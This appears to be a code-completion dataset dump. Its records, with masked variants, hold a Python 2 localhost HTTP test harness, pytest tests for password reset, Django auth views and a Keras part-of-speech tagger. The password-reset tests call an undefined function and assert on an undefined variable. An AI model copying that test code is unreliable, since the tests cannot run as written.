response = connection.getresponse()
if response.status != 200:
print('Request failed for input: %s. Reason: %s' % (inputs[i],
response.reason))
output = response.read()
print('Output:', output)
print('Expected:', expecteds[i])
if expecteds[i] == output:
print('SUCCESS')
else:
print('FAILURE')
<|reserved_special_token_1|>
import httplib
import sys
http_server = 'localhost:8000'
connection = httplib.HTTPConnection(http_server)
test_file_path = 'test_input'
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
expected_file_path = 'expected'
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert len(inputs) == len(expecteds)
for i in range(len(inputs)):
connection.request('GET', '<start>%s<end>' % inputs[i])
response = connection.getresponse()
if response.status != 200:
print('Request failed for input: %s. Reason: %s' % (inputs[i],
response.reason))
output = response.read()
print('Output:', output)
print('Expected:', expecteds[i])
if expecteds[i] == output:
print('SUCCESS')
else:
print('FAILURE')
<|reserved_special_token_1|>
import httplib
import sys
http_server = "localhost:8000"
connection = httplib.HTTPConnection(http_server)
# Open test input.
test_file_path = "test_input"
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
# Open expected input.
expected_file_path = "expected"
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert(len(inputs) == len(expecteds))
for i in range(len(inputs)):
connection.request("GET", ("<start>%s<end>" % inputs[i]))
response = connection.getresponse()
if response.status != 200:
print("Request failed for input: %s. Reason: %s" % (inputs[i], response.reason))
output = response.read()
print("Output:", output)
print("Expected:", expecteds[i])
if expecteds[i] == output:
print("SUCCESS")
else:
print("FAILURE")
|
flexible
|
{
"blob_id": "cd9b04a93d85ba0ee2a38b534386f9aec0ef6895",
"index": 5165,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntest_f.close()\n<mask token>\nexpected_f.close()\nassert len(inputs) == len(expecteds)\nfor i in range(len(inputs)):\n connection.request('GET', '<start>%s<end>' % inputs[i])\n response = connection.getresponse()\n if response.status != 200:\n print('Request failed for input: %s. Reason: %s' % (inputs[i],\n response.reason))\n output = response.read()\n print('Output:', output)\n print('Expected:', expecteds[i])\n if expecteds[i] == output:\n print('SUCCESS')\n else:\n print('FAILURE')\n",
"step-3": "<mask token>\nhttp_server = 'localhost:8000'\nconnection = httplib.HTTPConnection(http_server)\ntest_file_path = 'test_input'\ntest_f = open(test_file_path)\ninputs = test_f.readlines()\ninputs = [x.strip() for x in inputs]\ntest_f.close()\nexpected_file_path = 'expected'\nexpected_f = open(expected_file_path)\nexpecteds = expected_f.readlines()\nexpecteds = [x.strip() for x in expecteds]\nexpected_f.close()\nassert len(inputs) == len(expecteds)\nfor i in range(len(inputs)):\n connection.request('GET', '<start>%s<end>' % inputs[i])\n response = connection.getresponse()\n if response.status != 200:\n print('Request failed for input: %s. Reason: %s' % (inputs[i],\n response.reason))\n output = response.read()\n print('Output:', output)\n print('Expected:', expecteds[i])\n if expecteds[i] == output:\n print('SUCCESS')\n else:\n print('FAILURE')\n",
"step-4": "import httplib\nimport sys\nhttp_server = 'localhost:8000'\nconnection = httplib.HTTPConnection(http_server)\ntest_file_path = 'test_input'\ntest_f = open(test_file_path)\ninputs = test_f.readlines()\ninputs = [x.strip() for x in inputs]\ntest_f.close()\nexpected_file_path = 'expected'\nexpected_f = open(expected_file_path)\nexpecteds = expected_f.readlines()\nexpecteds = [x.strip() for x in expecteds]\nexpected_f.close()\nassert len(inputs) == len(expecteds)\nfor i in range(len(inputs)):\n connection.request('GET', '<start>%s<end>' % inputs[i])\n response = connection.getresponse()\n if response.status != 200:\n print('Request failed for input: %s. Reason: %s' % (inputs[i],\n response.reason))\n output = response.read()\n print('Output:', output)\n print('Expected:', expecteds[i])\n if expecteds[i] == output:\n print('SUCCESS')\n else:\n print('FAILURE')\n",
"step-5": "import httplib\nimport sys\n\nhttp_server = \"localhost:8000\"\nconnection = httplib.HTTPConnection(http_server)\n\n# Open test input. \ntest_file_path = \"test_input\"\ntest_f = open(test_file_path)\ninputs = test_f.readlines()\ninputs = [x.strip() for x in inputs]\ntest_f.close()\n\n# Open expected input.\nexpected_file_path = \"expected\"\nexpected_f = open(expected_file_path)\nexpecteds = expected_f.readlines()\nexpecteds = [x.strip() for x in expecteds]\nexpected_f.close()\nassert(len(inputs) == len(expecteds))\t\n\nfor i in range(len(inputs)):\n connection.request(\"GET\", (\"<start>%s<end>\" % inputs[i]))\n response = connection.getresponse()\n if response.status != 200:\n print(\"Request failed for input: %s. Reason: %s\" % (inputs[i], response.reason))\n output = response.read()\n print(\"Output:\", output)\n print(\"Expected:\", expecteds[i])\n if expecteds[i] == output:\n print(\"SUCCESS\")\n else:\n print(\"FAILURE\")\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from auth_passwordreset_reset import auth_passwordreset_reset
from auth_register import auth_register
from data import *
import pytest
#invalid reset code
def test_auth_passwordreset_reset1():
#create a test account
register = auth_register("[email protected]", "Hello123", "First", "Last")
#call password reset request
auth_passwordreset_request("[email protected]")
#assuming that the code from the email was "WER123"
#this should not work as the code "ABS124" doesnt match "WER123"
with pytest.raises(ValueError, match='*Incorrect Reset Code*'):
auth_passwordreset_reset("ABS124", "SomePass")
#invalid password
def test_auth_passwordreset_reset2():
#create a test account
register = auth_register("[email protected]", "Hello123", "First", "Last")
#call password reset request
auth_passwordreset_request("[email protected]")
#assume that the code generated was "AUW624"
#these should not work as the new passowrd lengths are <5
with pytest.raises(ValueError, match='*Invalid Password Length*'):
auth_passwordreset_reset("AUW624", "")
auth_passwordreset_reset("AUW624", "nope")
#valid case
def test_auth_passwordreset_reset3():
#create a test account
register = auth_register("[email protected]", "Hello123", "First", "Last")
#call password reset request
auth_passwordreset_request("[email protected]")
#assume that the code generated was "AUW624"
auth_passwordreset_reset("AUW624", "Valispass12")
#test to see if password updated
assert new_user_password == "Valispass12"
#this sequence should successfully reset the password
|
normal
|
{
"blob_id": "a315d01f0fb16f0c74c447c07b76f33e6ff6427d",
"index": 9742,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_auth_passwordreset_reset1():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset('ABS124', 'SomePass')\n\n\n<mask token>\n\n\ndef test_auth_passwordreset_reset3():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n auth_passwordreset_reset('AUW624', 'Valispass12')\n assert new_user_password == 'Valispass12'\n",
"step-3": "<mask token>\n\n\ndef test_auth_passwordreset_reset1():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset('ABS124', 'SomePass')\n\n\ndef test_auth_passwordreset_reset2():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Invalid Password Length*'):\n auth_passwordreset_reset('AUW624', '')\n auth_passwordreset_reset('AUW624', 'nope')\n\n\ndef test_auth_passwordreset_reset3():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n auth_passwordreset_reset('AUW624', 'Valispass12')\n assert new_user_password == 'Valispass12'\n",
"step-4": "from auth_passwordreset_reset import auth_passwordreset_reset\nfrom auth_register import auth_register\nfrom data import *\nimport pytest\n\n\ndef test_auth_passwordreset_reset1():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset('ABS124', 'SomePass')\n\n\ndef test_auth_passwordreset_reset2():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Invalid Password Length*'):\n auth_passwordreset_reset('AUW624', '')\n auth_passwordreset_reset('AUW624', 'nope')\n\n\ndef test_auth_passwordreset_reset3():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n auth_passwordreset_reset('AUW624', 'Valispass12')\n assert new_user_password == 'Valispass12'\n",
"step-5": "from auth_passwordreset_reset import auth_passwordreset_reset\nfrom auth_register import auth_register\nfrom data import *\nimport pytest\n\n\n#invalid reset code\ndef test_auth_passwordreset_reset1():\n \n #create a test account\n register = auth_register(\"[email protected]\", \"Hello123\", \"First\", \"Last\")\n \n #call password reset request\n auth_passwordreset_request(\"[email protected]\")\n \n #assuming that the code from the email was \"WER123\"\n \n #this should not work as the code \"ABS124\" doesnt match \"WER123\"\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset(\"ABS124\", \"SomePass\")\n \n#invalid password\ndef test_auth_passwordreset_reset2():\n\n #create a test account\n register = auth_register(\"[email protected]\", \"Hello123\", \"First\", \"Last\")\n \n #call password reset request\n auth_passwordreset_request(\"[email protected]\")\n \n #assume that the code generated was \"AUW624\"\n \n #these should not work as the new passowrd lengths are <5\n with pytest.raises(ValueError, match='*Invalid Password Length*'):\n auth_passwordreset_reset(\"AUW624\", \"\")\n auth_passwordreset_reset(\"AUW624\", \"nope\")\n \n#valid case\ndef test_auth_passwordreset_reset3():\n \n #create a test account\n register = auth_register(\"[email protected]\", \"Hello123\", \"First\", \"Last\")\n \n #call password reset request\n auth_passwordreset_request(\"[email protected]\")\n \n #assume that the code generated was \"AUW624\"\n auth_passwordreset_reset(\"AUW624\", \"Valispass12\") \n \n #test to see if password updated\n assert new_user_password == \"Valispass12\"\n #this sequence should successfully reset the password\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from bs4 import BeautifulSoup
import urllib.request
import re
import math
url_header = "http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314"
Webpage = urllib.request.urlopen(url_header).read()
Webpage=Webpage.decode('UTF-8')
# soup = BeautifulSoup(Webpage)
print (Webpage)
a=re.findall(r'var m_nRecordCount = (\d+)',str(Webpage))
print(a)
# page_count=soup.find('script')
# print(page_count)
total_page=math.ceil(int(a[0])/20)
print(total_page)
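
# --- Editor's note (not part of the original script). ---
# The page count assumes the result table shows 20 records per page:
# total_page = ceil(m_nRecordCount / 20). For example, if the page reported
# "var m_nRecordCount = 61", then a == ['61'] and total_page == ceil(61 / 20) == 4.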
|
normal
|
{
"blob_id": "62a86bd33755510f0d71f4920e63be1a3ce8c563",
"index": 6304,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(Webpage)\n<mask token>\nprint(a)\n<mask token>\nprint(total_page)\n",
"step-3": "<mask token>\nurl_header = (\n 'http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314'\n )\nWebpage = urllib.request.urlopen(url_header).read()\nWebpage = Webpage.decode('UTF-8')\nprint(Webpage)\na = re.findall('var m_nRecordCount = (\\\\d+)', str(Webpage))\nprint(a)\ntotal_page = math.ceil(int(a[0]) / 20)\nprint(total_page)\n",
"step-4": "from bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport math\nurl_header = (\n 'http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314'\n )\nWebpage = urllib.request.urlopen(url_header).read()\nWebpage = Webpage.decode('UTF-8')\nprint(Webpage)\na = re.findall('var m_nRecordCount = (\\\\d+)', str(Webpage))\nprint(a)\ntotal_page = math.ceil(int(a[0]) / 20)\nprint(total_page)\n",
"step-5": "from bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport math\n\nurl_header = \"http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314\"\nWebpage = urllib.request.urlopen(url_header).read()\nWebpage=Webpage.decode('UTF-8')\n# soup = BeautifulSoup(Webpage)\nprint (Webpage)\na=re.findall(r'var m_nRecordCount = (\\d+)',str(Webpage))\nprint(a)\n# page_count=soup.find('script')\n# print(page_count)\ntotal_page=math.ceil(int(a[0])/20)\nprint(total_page)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MenuView(View):
<|reserved_special_token_0|>
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MenuView(View):
def get(self, request, *args, **kwargs):
context = {'is_authenticated': request.user.is_authenticated,
'username': request.user.username}
return render(request, 'main.html', context=context)
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.views import LoginView
from django.shortcuts import render
from django.views import View
from django.views.generic import CreateView
from resume.forms import NewResumeForm
from vacancy.forms import NewVacancyForm
class MenuView(View):
def get(self, request, *args, **kwargs):
context = {
'is_authenticated': request.user.is_authenticated,
'username': request.user.username,
}
return render(request, 'main.html', context=context)
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {
'form': form,
'is_authenticated': request.user.is_authenticated,
'is_staff': request.user.is_staff,
'username': request.user.username,
}
return render(request, 'home.html', context=context)
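
# --- Editor's sketch: hypothetical URL wiring for the views above (not in the original file). ---
# The route paths and names below are assumptions; only the template names
# (main.html, signup.html, login.html, home.html) come from the views themselves.
#
# from django.urls import path
# from .views import MenuView, MySignupView, MyLoginView, HomeView
#
# urlpatterns = [
#     path('', MenuView.as_view(), name='main'),
#     path('signup/', MySignupView.as_view(), name='signup'),
#     path('login/', MyLoginView.as_view(), name='login'),
#     path('home/', HomeView.as_view(), name='home'),
# ]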
|
flexible
|
{
"blob_id": "a75691af17f6d1effd469d5c2ded340c71521ee1",
"index": 9310,
"step-1": "<mask token>\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-2": "<mask token>\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-3": "<mask token>\n\n\nclass MenuView(View):\n <mask token>\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-4": "<mask token>\n\n\nclass MenuView(View):\n\n def get(self, request, *args, **kwargs):\n context = {'is_authenticated': request.user.is_authenticated,\n 'username': request.user.username}\n return render(request, 'main.html', context=context)\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-5": "from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.views import LoginView\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django.views.generic import CreateView\n\nfrom resume.forms import NewResumeForm\nfrom vacancy.forms import NewVacancyForm\n\n\nclass MenuView(View):\n def get(self, request, *args, **kwargs):\n context = {\n 'is_authenticated': request.user.is_authenticated,\n 'username': request.user.username,\n }\n return render(request, 'main.html', context=context)\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {\n 'form': form,\n 'is_authenticated': request.user.is_authenticated,\n 'is_staff': request.user.is_staff,\n 'username': request.user.username,\n }\n return render(request, 'home.html', context=context)\n",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
<|reserved_special_token_0|>
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
<|reserved_special_token_0|>
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
<|reserved_special_token_0|>
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
def compute_test_accuracy(model):
test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(
test_tags, tag_to_id)
predicted_tag_probabilities = model.predict(test_words, verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
numerator = np.sum(np.logical_and(predicted_tags == test_tags,
test_words != 0))
denominator = np.sum(test_words != 0)
return float(numerator) / denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('..')
<|reserved_special_token_0|>
helpers.mask_busy_gpus(wait=False)
<|reserved_special_token_0|>
nltk.download('brown')
nltk.download('universal_tagset')
<|reserved_special_token_0|>
for sentence in data:
words, tags = zip(*sentence)
word_counts.update(words)
<|reserved_special_token_0|>
print('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /
sum(word_counts.values())))
<|reserved_special_token_0|>
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
<|reserved_special_token_0|>
print('Word ids:')
print(to_matrix(batch_words, word_to_id))
print('Tag ids:')
print(to_matrix(batch_tags, tag_to_id))
<|reserved_special_token_0|>
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
def compute_test_accuracy(model):
test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(
test_tags, tag_to_id)
predicted_tag_probabilities = model.predict(test_words, verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
numerator = np.sum(np.logical_and(predicted_tags == test_tags,
test_words != 0))
denominator = np.sum(test_words != 0)
return float(numerator) / denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
<|reserved_special_token_0|>
model.add(L.InputLayer([None], dtype='int32'))
model.add(L.Embedding(len(all_words), 50))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.Conv1D(128, 2, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 3, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 4, padding='same', activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256, activation='tanh')))
model.add(L.Dropout(0.25))
<|reserved_special_token_0|>
model.add(stepwise_dense)
model.summary()
model.compile('adam', 'categorical_crossentropy')
model.fit_generator(generate_batches(train_data), len(train_data) /
BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)
<|reserved_special_token_0|>
print("""
Final accuracy: %.5f""" % acc)
model.save_weights('LSTM_gpu_trained_weights_1layer.h5')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('..')
<|reserved_special_token_0|>
helpers.mask_busy_gpus(wait=False)
<|reserved_special_token_0|>
nltk.download('brown')
nltk.download('universal_tagset')
data = nltk.corpus.brown.tagged_sents(tagset='universal')
all_tags = ['#EOS#', '#UNK#', 'ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.',
'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']
data = np.array([[(word.lower(), tag) for word, tag in sentence] for
sentence in data])
<|reserved_special_token_0|>
train_data, test_data = train_test_split(data, test_size=0.25, random_state=42)
<|reserved_special_token_0|>
word_counts = Counter()
for sentence in data:
words, tags = zip(*sentence)
word_counts.update(words)
all_words = ['#EOS#', '#UNK#'] + list(list(zip(*word_counts.most_common(
10000)))[0])
print('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /
sum(word_counts.values())))
<|reserved_special_token_0|>
word_to_id = defaultdict(lambda : 1, {word: i for i, word in enumerate(
all_words)})
tag_to_id = {tag: i for i, tag in enumerate(all_tags)}
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
batch_words, batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])
print('Word ids:')
print(to_matrix(batch_words, word_to_id))
print('Tag ids:')
print(to_matrix(batch_tags, tag_to_id))
<|reserved_special_token_0|>
BATCH_SIZE = 32
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
def compute_test_accuracy(model):
test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(
test_tags, tag_to_id)
predicted_tag_probabilities = model.predict(test_words, verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
numerator = np.sum(np.logical_and(predicted_tags == test_tags,
test_words != 0))
denominator = np.sum(test_words != 0)
return float(numerator) / denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
model = keras.models.Sequential()
model = keras.models.Sequential()
model.add(L.InputLayer([None], dtype='int32'))
model.add(L.Embedding(len(all_words), 50))
